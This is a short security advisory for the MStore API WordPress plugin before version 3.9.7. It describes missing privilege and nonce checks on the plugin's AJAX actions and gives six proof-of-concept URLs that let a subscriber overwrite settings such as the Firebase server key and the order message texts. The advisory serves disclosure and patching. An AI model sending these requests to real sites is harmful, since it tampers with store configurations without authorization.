wpexploit | Truoc Phan | WPEX-ID:970735F1-24BB-441C-89B6-5A0959246D6C
Jun 19, 2023 - 12:00 a.m.

MStore API < 3.9.7 - Subscriber+ Unauthorized Settings Update

EPSS: 0.001 (Low), percentile 23.3%

The plugin does not secure most of its AJAX actions: they lack privilege checks, nonce checks, or both.

Make sure the site also has WooCommerce installed and activated. Then, while logged in as a subscriber, visit the following URLs:

- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message

Then, while logged in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.
